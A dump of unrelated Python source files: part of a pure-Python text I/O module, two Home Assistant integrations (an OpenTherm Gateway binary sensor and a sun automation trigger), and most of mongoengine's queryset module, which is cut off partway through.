self._set_decoded_chars('')
self._snapshot = None
if self._decoder:
self._decoder.reset()
return position
if whence != 0:
raise ValueError("invalid whence (%r, should be 0, 1 or 2)" %
(whence,))
if cookie < 0:
raise ValueError("negative seek position %r" % (cookie,))
self.flush()
# The strategy of seek() is to go back to the safe start point
# and replay the effect of read(chars_to_skip) from there.
start_pos, dec_flags, bytes_to_feed, need_eof, chars_to_skip = \
self._unpack_cookie(cookie)
# Seek back to the safe start point.
self.buffer.seek(start_pos)
self._set_decoded_chars('')
self._snapshot = None
# Restore the decoder to its state from the safe start point.
if cookie == 0 and self._decoder:
self._decoder.reset()
elif self._decoder or dec_flags or chars_to_skip:
self._decoder = self._decoder or self._get_decoder()
self._decoder.setstate((b'', dec_flags))
self._snapshot = (dec_flags, b'')
if chars_to_skip:
# Just like _read_chunk, feed the decoder and save a snapshot.
input_chunk = self.buffer.read(bytes_to_feed)
self._set_decoded_chars(
self._decoder.decode(input_chunk, need_eof))
self._snapshot = (dec_flags, input_chunk)
# Skip chars_to_skip of the decoded characters.
if len(self._decoded_chars) < chars_to_skip:
raise IOError("can't restore logical file position")
self._decoded_chars_used = chars_to_skip
# Finally, reset the encoder (merely useful for proper BOM handling)
try:
encoder = self._encoder or self._get_encoder()
except LookupError:
# Sometimes the encoder doesn't exist
pass
else:
if cookie != 0:
encoder.setstate(0)
else:
encoder.reset()
return cookie
def read(self, n=None):
self._checkReadable()
if n is None:
n = -1
decoder = self._decoder or self._get_decoder()
try:
n.__index__
except AttributeError as err:
raise TypeError("an integer is required") from err
if n < 0:
# Read everything.
result = (self._get_decoded_chars() +
decoder.decode(self.buffer.read(), final=True))
self._set_decoded_chars('')
self._snapshot = None
return result
else:
# Keep reading chunks until we have n characters to return.
eof = False
result = self._get_decoded_chars(n)
while len(result) < n and not eof:
eof = not self._read_chunk()
result += self._get_decoded_chars(n - len(result))
return result
def __next__(self):
self._telling = False
line = self.readline()
if not line:
self._snapshot = None
self._telling = self._seekable
raise StopIteration
return line
def readline(self, limit=None):
if self.closed:
raise ValueError("read from closed file")
if limit is None:
limit = -1
elif not isinstance(limit, int):
raise TypeError("limit must be an integer")
# Grab all the decoded text (we will rewind any extra bits later).
line = self._get_decoded_chars()
start = 0
# Make the decoder if it doesn't already exist.
if not self._decoder:
self._get_decoder()
pos = endpos = None
while True:
if self._readtranslate:
# Newlines are already translated, only search for \n
pos = line.find('\n', start)
if pos >= 0:
endpos = pos + 1
break
else:
start = len(line)
elif self._readuniversal:
# Universal newline search. Find any of \r, \r\n, \n
# The decoder ensures that \r\n are not split in two pieces
# In C we'd look for these in parallel of course.
nlpos = line.find("\n", start)
crpos = line.find("\r", start)
if crpos == -1:
if nlpos == -1:
# Nothing found
start = len(line)
else:
# Found \n
endpos = nlpos + 1
break
elif nlpos == -1:
# Found lone \r
endpos = crpos + 1
break
elif nlpos < crpos:
# Found \n
endpos = nlpos + 1
break
elif nlpos == crpos + 1:
# Found \r\n
endpos = crpos + 2
break
else:
# Found \r
endpos = crpos + 1
break
else:
# non-universal
pos = line.find(self._readnl)
if pos >= 0:
endpos = pos + len(self._readnl)
break
if limit >= 0 and len(line) >= limit:
endpos = limit # reached length limit
break
# No line ending seen yet - get more data'
while self._read_chunk():
if self._decoded_chars:
break
if self._decoded_chars:
line += self._get_decoded_chars()
else:
# end of file
self._set_decoded_chars('')
self._snapshot = None
return line
if limit >= 0 and endpos > limit:
endpos = limit # don't exceed limit
# Rewind _decoded_chars to just after the line ending we found.
self._rewind_decoded_chars(len(line) - endpos)
return line[:endpos]
@property
def newlines(self):
return self._decoder.newlines if self._decoder else None
class StringIO(TextIOWrapper):
"""Text I/O implementation using an in-memory buffer.
The initial_value argument sets the value of object. The newline
argument is like the one of TextIOWrapper's constructor.
"""
def __init__(self, initial_value="", newline="\n"):
super(StringIO, self).__init__(BytesIO(),
encoding="utf-8",
errors="strict",
newline=newline)
# Issue #5645: make universal newlines semantics the same as in the
# C version, even under Windows.
if newline is None:
self._writetranslate = False
if initial_value is not None:
if not isinstance(initial_value, str):
raise TypeError("initial_value must be str or None, not {0}"
.format(type(initial_value).__name__))
initial_value = str(initial_value)
self.write(initial_value)
self.seek(0)
def getvalue(self):
self.flush()
return self.buffer.getvalue().decode(self._encoding, self._errors)
def __repr__(self):
# TextIOWrapper tells the encoding in its repr. In StringIO,
# that's a implementation detail.
return object.__repr__(self)
@property
def errors(self):
return None
@property
def encoding(self):
return None
def detach(self):
# This doesn't make sense on StringIO.
self._unsupported("detach")
|
balloob/home-assistant
|
refs/heads/dev
|
homeassistant/components/opentherm_gw/binary_sensor.py
|
12
|
"""Support for OpenTherm Gateway binary sensors."""
import logging
from homeassistant.components.binary_sensor import ENTITY_ID_FORMAT, BinarySensorEntity
from homeassistant.const import CONF_ID
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import async_generate_entity_id
from . import DOMAIN
from .const import BINARY_SENSOR_INFO, DATA_GATEWAYS, DATA_OPENTHERM_GW
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the OpenTherm Gateway binary sensors."""
sensors = []
for var, info in BINARY_SENSOR_INFO.items():
device_class = info[0]
friendly_name_format = info[1]
sensors.append(
OpenThermBinarySensor(
hass.data[DATA_OPENTHERM_GW][DATA_GATEWAYS][config_entry.data[CONF_ID]],
var,
device_class,
friendly_name_format,
)
)
async_add_entities(sensors)
class OpenThermBinarySensor(BinarySensorEntity):
"""Represent an OpenTherm Gateway binary sensor."""
def __init__(self, gw_dev, var, device_class, friendly_name_format):
"""Initialize the binary sensor."""
self.entity_id = async_generate_entity_id(
ENTITY_ID_FORMAT, f"{var}_{gw_dev.gw_id}", hass=gw_dev.hass
)
self._gateway = gw_dev
self._var = var
self._state = None
self._device_class = device_class
self._friendly_name = friendly_name_format.format(gw_dev.name)
self._unsub_updates = None
async def async_added_to_hass(self):
"""Subscribe to updates from the component."""
_LOGGER.debug("Added OpenTherm Gateway binary sensor %s", self._friendly_name)
self._unsub_updates = async_dispatcher_connect(
self.hass, self._gateway.update_signal, self.receive_report
)
async def async_will_remove_from_hass(self):
"""Unsubscribe from updates from the component."""
_LOGGER.debug(
"Removing OpenTherm Gateway binary sensor %s", self._friendly_name
)
self._unsub_updates()
@property
def available(self):
"""Return availability of the sensor."""
return self._state is not None
@property
def entity_registry_enabled_default(self):
"""Disable binary_sensors by default."""
return False
@callback
def receive_report(self, status):
"""Handle status updates from the component."""
state = status.get(self._var)
self._state = None if state is None else bool(state)
self.async_write_ha_state()
@property
def name(self):
"""Return the friendly name."""
return self._friendly_name
@property
def device_info(self):
"""Return device info."""
return {
"identifiers": {(DOMAIN, self._gateway.gw_id)},
"name": self._gateway.name,
"manufacturer": "Schelte Bron",
"model": "OpenTherm Gateway",
"sw_version": self._gateway.gw_version,
}
@property
def unique_id(self):
"""Return a unique ID."""
return f"{self._gateway.gw_id}-{self._var}"
@property
def is_on(self):
"""Return true if the binary sensor is on."""
return self._state
@property
def device_class(self):
"""Return the class of this device."""
return self._device_class
@property
def should_poll(self):
"""Return False because entity pushes its state."""
return False
|
hexxter/home-assistant
|
refs/heads/dev
|
homeassistant/components/automation/sun.py
|
19
|
"""
Offer sun based automation rules.
For more details about this automation rule, please refer to the documentation
at https://home-assistant.io/components/automation/#sun-trigger
"""
from datetime import timedelta
import logging
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.const import (
CONF_EVENT, CONF_OFFSET, CONF_PLATFORM, SUN_EVENT_SUNRISE)
from homeassistant.helpers.event import async_track_sunrise, async_track_sunset
import homeassistant.helpers.config_validation as cv
DEPENDENCIES = ['sun']
_LOGGER = logging.getLogger(__name__)
TRIGGER_SCHEMA = vol.Schema({
vol.Required(CONF_PLATFORM): 'sun',
vol.Required(CONF_EVENT): cv.sun_event,
vol.Required(CONF_OFFSET, default=timedelta(0)): cv.time_period,
})
def async_trigger(hass, config, action):
"""Listen for events based on configuration."""
event = config.get(CONF_EVENT)
offset = config.get(CONF_OFFSET)
@callback
def call_action():
"""Call action with right context."""
hass.async_run_job(action, {
'trigger': {
'platform': 'sun',
'event': event,
'offset': offset,
},
})
# Do something to call action
if event == SUN_EVENT_SUNRISE:
return async_track_sunrise(hass, call_action, offset)
else:
return async_track_sunset(hass, call_action, offset)
|
colinhowe/mongoengine
|
refs/heads/master
|
mongoengine/queryset.py
|
2
|
import pprint
import re
import copy
import itertools
import operator
import pymongo
from bson.code import Code
from mongoengine import signals
__all__ = ['queryset_manager', 'Q', 'InvalidQueryError',
'DO_NOTHING', 'NULLIFY', 'CASCADE', 'DENY']
# The maximum number of items to display in a QuerySet.__repr__
REPR_OUTPUT_SIZE = 20
# Delete rules
DO_NOTHING = 0
NULLIFY = 1
CASCADE = 2
DENY = 3
class DoesNotExist(Exception):
pass
class MultipleObjectsReturned(Exception):
pass
class InvalidQueryError(Exception):
pass
class OperationError(Exception):
pass
RE_TYPE = type(re.compile(''))
class QNodeVisitor(object):
"""Base visitor class for visiting Q-object nodes in a query tree.
"""
def visit_combination(self, combination):
"""Called by QCombination objects.
"""
return combination
def visit_query(self, query):
"""Called by (New)Q objects.
"""
return query
class SimplificationVisitor(QNodeVisitor):
"""Simplifies query trees by combinging unnecessary 'and' connection nodes
into a single Q-object.
"""
def visit_combination(self, combination):
if combination.operation == combination.AND:
# The simplification only applies to 'simple' queries
if all(isinstance(node, Q) for node in combination.children):
queries = [node.query for node in combination.children]
return Q(**self._query_conjunction(queries))
return combination
def _query_conjunction(self, queries):
"""Merges query dicts - effectively &ing them together.
"""
query_ops = set()
combined_query = {}
for query in queries:
ops = set(query.keys())
# Make sure that the same operation isn't applied more than once
# to a single field
intersection = ops.intersection(query_ops)
if intersection:
msg = 'Duplicate query conditions: '
raise InvalidQueryError(msg + ', '.join(intersection))
query_ops.update(ops)
combined_query.update(copy.deepcopy(query))
return combined_query
class QueryTreeTransformerVisitor(QNodeVisitor):
"""Transforms the query tree in to a form that may be used with MongoDB.
"""
def visit_combination(self, combination):
if combination.operation == combination.AND:
# MongoDB doesn't allow us to have too many $or operations in our
# queries, so the aim is to move the ORs up the tree to one
# 'master' $or. Firstly, we must find all the necessary parts (part
# of an AND combination or just standard Q object), and store them
# separately from the OR parts.
or_groups = []
and_parts = []
for node in combination.children:
if isinstance(node, QCombination):
if node.operation == node.OR:
# Any of the children in an $or component may cause
# the query to succeed
or_groups.append(node.children)
elif node.operation == node.AND:
and_parts.append(node)
elif isinstance(node, Q):
and_parts.append(node)
# Now we combine the parts into a usable query. AND together all of
# the necessary parts. Then for each $or part, create a new query
# that ANDs the necessary part with the $or part.
clauses = []
for or_group in itertools.product(*or_groups):
q_object = reduce(lambda a, b: a & b, and_parts, Q())
q_object = reduce(lambda a, b: a & b, or_group, q_object)
clauses.append(q_object)
# Finally, $or the generated clauses in to one query. Each of the
# clauses is sufficient for the query to succeed.
return reduce(lambda a, b: a | b, clauses, Q())
if combination.operation == combination.OR:
children = []
# Crush any nested ORs in to this combination as MongoDB doesn't
# support nested $or operations
for node in combination.children:
if (isinstance(node, QCombination) and
node.operation == combination.OR):
children += node.children
else:
children.append(node)
combination.children = children
return combination
class QueryCompilerVisitor(QNodeVisitor):
"""Compiles the nodes in a query tree to a PyMongo-compatible query
dictionary.
"""
def __init__(self, document):
self.document = document
def visit_combination(self, combination):
if combination.operation == combination.OR:
return {'$or': combination.children}
elif combination.operation == combination.AND:
return self._mongo_query_conjunction(combination.children)
return combination
def visit_query(self, query):
return QuerySet._transform_query(self.document, **query.query)
def _mongo_query_conjunction(self, queries):
"""Merges Mongo query dicts - effectively &ing them together.
"""
combined_query = {}
for query in queries:
for field, ops in query.items():
if field not in combined_query:
combined_query[field] = ops
else:
# The field is already present in the query the only way
# we can merge is if both the existing value and the new
# value are operation dicts, reject anything else
if (not isinstance(combined_query[field], dict) or
not isinstance(ops, dict)):
message = 'Conflicting values for ' + field
raise InvalidQueryError(message)
current_ops = set(combined_query[field].keys())
new_ops = set(ops.keys())
# Make sure that the same operation isn't applied more than
# once to a single field
intersection = current_ops.intersection(new_ops)
if intersection:
msg = 'Duplicate query conditions: '
raise InvalidQueryError(msg + ', '.join(intersection))
# Right! We've got two non-overlapping dicts of operations!
combined_query[field].update(copy.deepcopy(ops))
return combined_query
class QNode(object):
"""Base class for nodes in query trees.
"""
AND = 0
OR = 1
def to_query(self, document):
query = self.accept(SimplificationVisitor())
query = query.accept(QueryTreeTransformerVisitor())
query = query.accept(QueryCompilerVisitor(document))
return query
def accept(self, visitor):
raise NotImplementedError
def _combine(self, other, operation):
"""Combine this node with another node into a QCombination object.
"""
if other.empty:
return self
if self.empty:
return other
return QCombination(operation, [self, other])
@property
def empty(self):
return False
def __or__(self, other):
return self._combine(other, self.OR)
def __and__(self, other):
return self._combine(other, self.AND)
class QCombination(QNode):
"""Represents the combination of several conditions by a given logical
operator.
"""
def __init__(self, operation, children):
self.operation = operation
self.children = []
for node in children:
# If the child is a combination of the same type, we can merge its
# children directly into this combinations children
if isinstance(node, QCombination) and node.operation == operation:
self.children += node.children
else:
self.children.append(node)
def accept(self, visitor):
for i in range(len(self.children)):
if isinstance(self.children[i], QNode):
self.children[i] = self.children[i].accept(visitor)
return visitor.visit_combination(self)
@property
def empty(self):
return not bool(self.children)
class Q(QNode):
"""A simple query object, used in a query tree to build up more complex
query structures.
"""
def __init__(self, **query):
self.query = query
def accept(self, visitor):
return visitor.visit_query(self)
@property
def empty(self):
return not bool(self.query)
class QueryFieldList(object):
"""Object that handles combinations of .only() and .exclude() calls"""
ONLY = 1
EXCLUDE = 0
def __init__(self, fields=[], value=ONLY, always_include=[]):
self.value = value
self.fields = set(fields)
self.always_include = set(always_include)
self._id = None
def as_dict(self):
field_list = dict((field, self.value) for field in self.fields)
if self._id is not None:
field_list['_id'] = self._id
return field_list
def __add__(self, f):
if not self.fields:
self.fields = f.fields
self.value = f.value
elif self.value is self.ONLY and f.value is self.ONLY:
self.fields = self.fields.intersection(f.fields)
elif self.value is self.EXCLUDE and f.value is self.EXCLUDE:
self.fields = self.fields.union(f.fields)
elif self.value is self.ONLY and f.value is self.EXCLUDE:
self.fields -= f.fields
elif self.value is self.EXCLUDE and f.value is self.ONLY:
self.value = self.ONLY
self.fields = f.fields - self.fields
if '_id' in f.fields:
self._id = f.value
if self.always_include:
if self.value is self.ONLY and self.fields:
self.fields = self.fields.union(self.always_include)
else:
self.fields -= self.always_include
return self
def reset(self):
self.fields = set([])
self.value = self.ONLY
def __nonzero__(self):
return bool(self.fields)
class QuerySet(object):
"""A set of results returned from a query. Wraps a MongoDB cursor,
providing :class:`~mongoengine.Document` objects as the results.
"""
__already_indexed = set()
def __init__(self, document, collection):
self._document = document
self._collection_obj = collection
self._mongo_query = None
self._query_obj = Q()
self._initial_query = {}
self._where_clause = None
self._loaded_fields = QueryFieldList()
self._ordering = []
self._snapshot = False
self._timeout = True
self._class_check = True
self._slave_okay = False
self._read_preference = None
self._scalar = []
# If inheritance is allowed, only return instances and instances of
# subclasses of the class being used
if document._meta.get('allow_inheritance'):
cls_list = document._get_subdocuments() + [document]
cls_list = [c._class_name for c in cls_list]
self._initial_query = {'_cls': {'$in': cls_list}}
self._loaded_fields = QueryFieldList(always_include=['_cls'])
self._cursor_obj = None
self._limit = None
self._skip = None
self._hint = -1 # Using -1 as None is a valid value for hint
def clone(self):
"""Creates a copy of the current :class:`~mongoengine.queryset.QuerySet`
.. versionadded:: 0.5
"""
c = self.__class__(self._document, self._collection_obj)
copy_props = ('_initial_query', '_query_obj', '_where_clause',
'_loaded_fields', '_ordering', '_snapshot',
'_timeout', '_limit', '_skip', '_slave_okay', '_hint',
'_read_preference',)
for prop in copy_props:
val = getattr(self, prop)
setattr(c, prop, copy.deepcopy(val))
return c
@property
def _query(self):
if self._mongo_query is None:
self._mongo_query = self._query_obj.to_query(self._document)
if self._class_check:
self._mongo_query.update(self._initial_query)
return self._mongo_query
def ensure_index(self, key_or_list, drop_dups=False, background=False,
**kwargs):
"""Ensure that the given indexes are in place.
:param key_or_list: a single index key or a list of index keys (to
construct a multi-field index); keys may be prefixed with a **+**
or a **-** to determine the index ordering
"""
index_spec = QuerySet._build_index_spec(self._document, key_or_list)
self._collection.ensure_index(
index_spec['fields'],
drop_dups=drop_dups,
background=background,
sparse=index_spec.get('sparse', False),
unique=index_spec.get('unique', False))
return self
@classmethod
def _build_index_spec(cls, doc_cls, spec):
"""Build a PyMongo index spec from a MongoEngine index spec.
"""
if isinstance(spec, basestring):
spec = {'fields': [spec]}
if isinstance(spec, (list, tuple)):
spec = {'fields': spec}
index_list = []
for key in spec['fields']:
# Get ASCENDING direction from +, DESCENDING from -, and GEO2D from *
direction = pymongo.ASCENDING
if key.startswith("-"):
direction = pymongo.DESCENDING
elif key.startswith("*"):
direction = pymongo.GEO2D
if key.startswith(("+", "-", "*")):
key = key[1:]
# Use real field name, do it manually because we need field
# objects for the next part (list field checking)
parts = key.split('.')
fields = QuerySet._lookup_field(doc_cls, parts)
parts = [field.db_field for field in fields]
key = '.'.join(parts)
index_list.append((key, direction))
spec['fields'] = index_list
if spec.get('sparse', False) and len(spec['fields']) > 1:
raise ValueError(
'Sparse indexes can only have one field in them. '
'See https://jira.mongodb.org/browse/SERVER-2193')
return spec
@classmethod
def _reset_already_indexed(cls, document=None):
"""Helper to reset already indexed, can be useful for testing purposes"""
if document:
cls.__already_indexed.discard(document)
cls.__already_indexed.clear()
def __call__(self, q_obj=None, class_check=True, slave_okay=False, **query):
"""Filter the selected documents by calling the
:class:`~mongoengine.queryset.QuerySet` with a query.
:param q_obj: a :class:`~mongoengine.queryset.Q` object to be used in
the query; the :class:`~mongoengine.queryset.QuerySet` is filtered
multiple times with different :class:`~mongoengine.queryset.Q`
objects, only the last one will be used
:param class_check: If set to False bypass class name check when
querying collection
:param slave_okay: if True, allows this query to be run against a
replica secondary.
:param query: Django-style query keyword arguments
"""
query = Q(**query)
if q_obj:
query &= q_obj
self._query_obj &= query
self._mongo_query = None
self._cursor_obj = None
self._class_check = class_check
return self
def filter(self, *q_objs, **query):
"""An alias of :meth:`~mongoengine.queryset.QuerySet.__call__`
"""
return self.__call__(*q_objs, **query)
def all(self):
"""Returns all documents."""
return self.__call__()
@property
def _collection(self):
"""Property that returns the collection object. This allows us to
perform operations only if the collection is accessed.
"""
if self._document not in QuerySet.__already_indexed:
# Ensure collection exists
QuerySet.__already_indexed.add(self._document)
return self._collection_obj
@property
def _cursor_args(self):
cursor_args = {
'snapshot': self._snapshot,
'timeout': self._timeout,
}
if self._read_preference:
cursor_args['read_preference'] = self._read_preference
else:
cursor_args['slave_okay'] = self._slave_okay
if self._loaded_fields:
cursor_args['fields'] = self._loaded_fields.as_dict()
return cursor_args
@property
def _cursor(self):
if self._cursor_obj is None:
self._cursor_obj = self._collection.find(self._query,
**self._cursor_args)
# Apply where clauses to cursor
if self._where_clause:
self._cursor_obj.where(self._where_clause)
# apply default ordering
if self._ordering:
self._cursor_obj.sort(self._ordering)
elif self._document._meta['ordering']:
self.order_by(*self._document._meta['ordering'])
if self._limit is not None:
self._cursor_obj.limit(self._limit - (self._skip or 0))
if self._skip is not None:
self._cursor_obj.skip(self._skip)
if self._hint != -1:
self._cursor_obj.hint(self._hint)
return self._cursor_obj
@classmethod
def _lookup_field(cls, document, parts):
"""Lookup a field based on its attribute and return a list containing
the field's parents and the field.
"""
if not isinstance(parts, (list, tuple)):
parts = [parts]
fields = []
field = None
for field_name in parts:
# Handle ListField indexing:
if field_name.isdigit():
try:
new_field = field.field
except AttributeError, err:
raise InvalidQueryError(
"Can't use index on unsubscriptable field (%s)" % err)
fields.append(field_name)
continue
if field is None:
# Look up first field from the document
if field_name == 'pk':
# Deal with "primary key" alias
field_name = document._meta['id_field']
if field_name in document._fields:
field = document._fields[field_name]
elif document._dynamic:
from base import BaseDynamicField
field = BaseDynamicField(db_field=field_name)
else:
raise InvalidQueryError('Cannot resolve field "%s"'
% field_name)
else:
from mongoengine.fields import ReferenceField, GenericReferenceField
if isinstance(field, (ReferenceField, GenericReferenceField)):
raise InvalidQueryError('Cannot perform join in mongoDB: %s' % '__'.join(parts))
# Look up subfield on the previous field
new_field = field.lookup_member(field_name)
from base import ComplexBaseField
if not new_field and isinstance(field, ComplexBaseField):
fields.append(field_name)
continue
elif not new_field:
raise InvalidQueryError('Cannot resolve field "%s"'
% field_name)
field = new_field # update field to the new field type
fields.append(field)
return fields
@classmethod
def _translate_field_name(cls, doc_cls, field, sep='.'):
"""Translate a field attribute name to a database field name.
"""
parts = field.split(sep)
parts = [f.db_field for f in QuerySet._lookup_field(doc_cls, parts)]
return '.'.join(parts)
@classmethod
def _transform_query(cls, _doc_cls=None, _field_operation=False, **query):
"""Transform a query from Django-style format to Mongo format.
"""
operators = ['ne', 'gt', 'gte', 'lt', 'lte', 'in', 'nin', 'mod',
'all', 'size', 'exists', 'not']
geo_operators = ['within_distance', 'within_spherical_distance', 'within_box', 'within_polygon', 'near', 'near_sphere']
match_operators = ['contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith',
'exact', 'iexact']
custom_operators = ['match']
mongo_query = {}
for key, value in query.items():
if key == "__raw__":
mongo_query.update(value)
continue
parts = key.split('__')
indices = [(i, p) for i, p in enumerate(parts) if p.isdigit()]
parts = [part for part in parts if not part.isdigit()]
# Check for an operator and transform to mongo-style if there is
op = None
if parts[-1] in operators + match_operators + geo_operators + custom_operators:
op = parts.pop()
negate = False
if parts[-1] == 'not':
parts.pop()
negate = True
if _doc_cls:
# Switch field names to proper names [set in Field(name='foo')]
fields = QuerySet._lookup_field(_doc_cls, parts)
parts = []
cleaned_fields = []
for field in fields:
append_field = True
if isinstance(field, str):
parts.append(field)
append_field = False
else:
parts.append(field.db_field)
if append_field:
cleaned_fields.append(field)
# Convert value to proper value
field = cleaned_fields[-1]
singular_ops = [None, 'ne', 'gt', 'gte', 'lt', 'lte', 'not']
singular_ops += match_operators
if op in singular_ops:
if isinstance(field, basestring):
if op in match_operators and isinstance(value, basestring):
from mongoengine import StringField
value = StringField.prepare_query_value(op, value)
else:
value = field
else:
value = field.prepare_query_value(op, value)
elif op in ('in', 'nin', 'all', 'near'):
# 'in', 'nin' and 'all' require a list of values
value = [field.prepare_query_value(op, v) for v in value]
# if op and op not in match_operators:
if op:
if op in geo_operators:
if op == "within_distance":
value = {'$within': {'$center': value}}
elif op == "within_spherical_distance":
value = {'$within': {'$centerSphere': value}}
elif op == "within_polygon":
value = {'$within': {'$polygon': value}}
elif op == "near":
value = {'$near': value}
elif op == "near_sphere":
value = {'$nearSphere': value}
elif op == 'within_box':
value = {'$within': {'$box': value}}
else:
raise NotImplementedError("Geo method '%s' has not "
"been implemented" % op)
elif op in custom_operators:
if op == 'match':
value = {"$elemMatch": value}
else:
NotImplementedError("Custom method '%s' has not "
"been implemented" % op)
elif op not in match_operators:
value = {'$' + op: value}
if negate:
value = {'$not': value}
for i, part in indices:
parts.insert(i, part)
key = '.'.join(parts)
if op is None or key not in mongo_query:
mongo_query[key] = value
elif key in mongo_query and isinstance(mongo_query[key], dict):
mongo_query[key].update(value)
return mongo_query
def get(self, *q_objs, **query):
"""Retrieve the the matching object raising
:class:`~mongoengine.queryset.MultipleObjectsReturned` or
`DocumentName.MultipleObjectsReturned` exception if multiple results and
:class:`~mongoengine.queryset.DoesNotExist` or `DocumentName.DoesNotExist`
if no results are found.
.. versionadded:: 0.3
"""
self.limit(2)
self.__call__(*q_objs, **query)
try:
result1 = self.next()
except StopIteration:
raise self._document.DoesNotExist("%s matching query does not exist."
% self._document._class_name)
try:
result2 = self.next()
except StopIteration:
return result1
self.rewind()
message = u'%d items returned, instead of 1' % self.count()
raise self._document.MultipleObjectsReturned(message)
def get_or_create(self, write_options=None, auto_save=True, *q_objs, **query):
"""Retrieve unique object or create, if it doesn't exist. Returns a tuple of
``(object, created)``, where ``object`` is the retrieved or created object
and ``created`` is a boolean specifying whether a new object was created. Raises
:class:`~mongoengine.queryset.MultipleObjectsReturned` or
`DocumentName.MultipleObjectsReturned` if multiple results are found.
A new document will be created if the document doesn't exists; a
dictionary of default values for the new document may be provided as a
keyword argument called :attr:`defaults`.
:param write_options: optional extra keyword arguments used if we
have to create a new document.
Passes any write_options onto :meth:`~mongoengine.Document.save`
.. versionadded:: 0.3
:param auto_save: if the object is to be saved automatically if not found.
.. versionadded:: 0.6
"""
defaults = query.get('defaults', {})
if 'defaults' in query:
del query['defaults']
try:
doc = self.get(*q_objs, **query)
return doc, False
except self._document.DoesNotExist:
query.update(defaults)
doc = self._document(**query)
if auto_save:
doc.save(write_options=write_options)
return doc, True
def create(self, **kwargs):
"""Create new object. Returns the saved object instance.
.. versionadded:: 0.4
"""
doc = self._document(**kwargs)
doc.save()
return doc
def first(self):
"""Retrieve the first object matching the query.
"""
try:
result = self[0]
except IndexError:
result = None
return result
def insert(self, doc_or_docs, load_bulk=True):
"""bulk insert documents
:param docs_or_doc: a document or list of documents to be inserted
:param load_bulk (optional): If True returns the list of document instances
By default returns document instances, set ``load_bulk`` to False to
return just ``ObjectIds``
.. versionadded:: 0.5
"""
from document import Document
docs = doc_or_docs
return_one = False
if isinstance(docs, Document) or issubclass(docs.__class__, Document):
return_one = True
docs = [docs]
raw = []
for doc in docs:
if not isinstance(doc, self._document):
msg = "Some documents inserted aren't instances of %s" % str(self._document)
raise OperationError(msg)
if doc.pk:
msg = "Some documents have ObjectIds use doc.update() instead"
raise OperationError(msg)
raw.append(doc.to_mongo())
signals.pre_bulk_insert.send(self._document, documents=docs)
ids = self._collection.insert(raw)
if not load_bulk:
signals.post_bulk_insert.send(
self._document, documents=docs, loaded=False)
return return_one and ids[0] or ids
documents = self.in_bulk(ids)
results = []
for obj_id in ids:
results.append(documents.get(obj_id))
signals.post_bulk_insert.send(
self._document, documents=results, loaded=True)
return return_one and results[0] or results
def with_id(self, object_id):
"""Retrieve the object matching the id provided. Uses `object_id` only
and raises InvalidQueryError if a filter has been applied.
:param object_id: the value for the id of the document to look up
.. versionchanged:: 0.6 Raises InvalidQueryError if filter has been set
"""
if not self._query_obj.empty:
raise InvalidQueryError("Cannot use a filter whilst using `with_id`")
return self.filter(pk=object_id).first()
def in_bulk(self, object_ids):
"""Retrieve a set of documents by their ids.
:param object_ids: a list or tuple of ``ObjectId``\ s
:rtype: dict of ObjectIds as keys and collection-specific
Document subclasses as values.
.. versionadded:: 0.3
"""
doc_map = {}
docs = self._collection.find({'_id': {'$in': object_ids}},
**self._cursor_args)
if self._scalar:
for doc in docs:
doc_map[doc['_id']] = self._get_scalar(
self._document._from_son(doc))
else:
for doc in docs:
doc_map[doc['_id']] = self._document._from_son(doc)
return doc_map
def next(self):
"""Wrap the result in a :class:`~mongoengine.Document` object.
"""
try:
if self._limit == 0:
raise StopIteration
if self._scalar:
return self._get_scalar(self._document._from_son(
self._cursor.next()))
return self._document._from_son(self._cursor.next())
except StopIteration, e:
self.rewind()
raise e
def rewind(self):
"""Rewind the cursor to its unevaluated state.
.. versionadded:: 0.3
"""
self._cursor.rewind()
def count(self):
"""Count the selected elements in the query.
"""
if self._limit == 0:
return 0
return self._cursor.count(with_limit_and_skip=True)
def __len__(self):
return self.count()
def map_reduce(self, map_f, reduce_f, output, finalize_f=None, limit=None,
scope=None):
"""Perform a map/reduce query using the current query spec
and ordering. While ``map_reduce`` respects ``QuerySet`` chaining,
it must be the last call made, as it does not return a maleable
``QuerySet``.
See the :meth:`~mongoengine.tests.QuerySetTest.test_map_reduce`
and :meth:`~mongoengine.tests.QuerySetTest.test_map_advanced`
tests in ``tests.queryset.QuerySetTest`` for usage examples.
:param map_f: map function, as :class:`~bson.code.Code` or string
:param reduce_f: reduce function, as
:class:`~bson.code.Code` or string
:param output: output collection name, if set to 'inline' will try to
use :class:`~pymongo.collection.Collection.inline_map_reduce`
:param finalize_f: finalize function, an optional function that
performs any post-reduction processing.
:param scope: values to insert into map/reduce global scope. Optional.
:param limit: number of objects from current query to provide
to map/reduce method
Returns an iterator yielding
:class:`~mongoengine.document.MapReduceDocument`.
.. note::
Map/Reduce changed in server version **>= 1.7.4**. The PyMongo
:meth:`~pymongo.collection.Collection.map_reduce` helper requires
PyMongo version **>= 1.11**.
.. versionchanged:: 0.5
- removed ``keep_temp`` keyword argument, which was only relevant
for MongoDB server versions older than 1.7.4
.. versionadded:: 0.3
"""
from document import MapReduceDocument
if not hasattr(self._collection, "map_reduce"):
raise NotImplementedError("Requires MongoDB >= 1.7.1")
map_f_scope = {}
if isinstance(map_f, Code):
map_f_scope = map_f.scope
map_f = unicode(map_f)
map_f = Code(self._sub_js_fields(map_f), map_f_scope)
reduce_f_scope = {}
if isinstance(reduce_f, Code):
reduce_f_scope = reduce_f.scope
reduce_f = unicode(reduce_f)
reduce_f_code = self._sub_js_fields(reduce_f)
reduce_f = Code(reduce_f_code, reduce_f_scope)
mr_args = {'query': self._query}
if finalize_f:
finalize_f_scope = {}
if isinstance(finalize_f, Code):
finalize_f_scope = finalize_f.scope
finalize_f = unicode(finalize_f)
finalize_f_code = self._sub_js_fields(finalize_f)
finalize_f = Code(finalize_f_code, finalize_f_scope)
mr_args['finalize'] = finalize_f
if scope:
mr_args['scope'] = scope
if limit:
mr_args['limit'] = limit
if output == 'inline' and not self._ordering:
map_reduce_function = 'inline_map_reduce'
else:
map_reduce_function = 'map_reduce'
mr_args['out'] = output
results = getattr(self._collection, map_reduce_function)(map_f, reduce_f, **mr_args)
if map_reduce_function == 'map_reduce':
results = results.find()
if self._ordering:
results = results.sort(self._ordering)
for doc in results:
yield MapReduceDocument(self._document, self._collection,
doc['_id'], doc['value'])
def limit(self, n):
